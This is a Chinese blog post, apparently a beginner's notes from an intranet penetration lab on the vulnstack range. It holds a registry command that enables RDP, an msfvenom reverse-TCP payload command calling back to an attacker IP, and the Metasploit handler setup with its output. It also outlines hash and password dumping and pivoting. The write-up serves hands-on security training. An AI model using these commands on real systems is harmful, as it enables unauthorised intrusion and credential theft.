内网渗透靶机演练
靶场: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
参考: https://www.anquanke.com/post/id/189940
第一次做关于内网渗透的靶场所以记录一下,靶场还没完成(太菜了)。。。。。。
入侵服务器
http://192.168.226.31/yxcms/index.php?r=admin
查看当前权限
查看3389端口是否开启
开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
添加一个用户
远程登录
内网信息收集
net view /domain
查询域列表
查询同域的机器
判断主域
获取域控的IP地址
域中其他主机IP地址
查询域用户
制作反弹shell
这里请制作32的shell,64为连接不稳定
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.226.30 lport=4444 -f exe -o shell.exe
蚁剑文件上传
进入msf命令行
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.30
lhost => 192.168.226.30
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
获取system权限
获取hash
获取明文密码
添加路由表来跨域攻击
即所有对74网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递
设置代理
看主机3389端口是否开启
给域成员添加用户
使用ew制作内网代理
使用代理后的msf攻击域成员
还有很多地方需要深入了解,努力学习!!!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 上周热点回顾(3.3-3.9)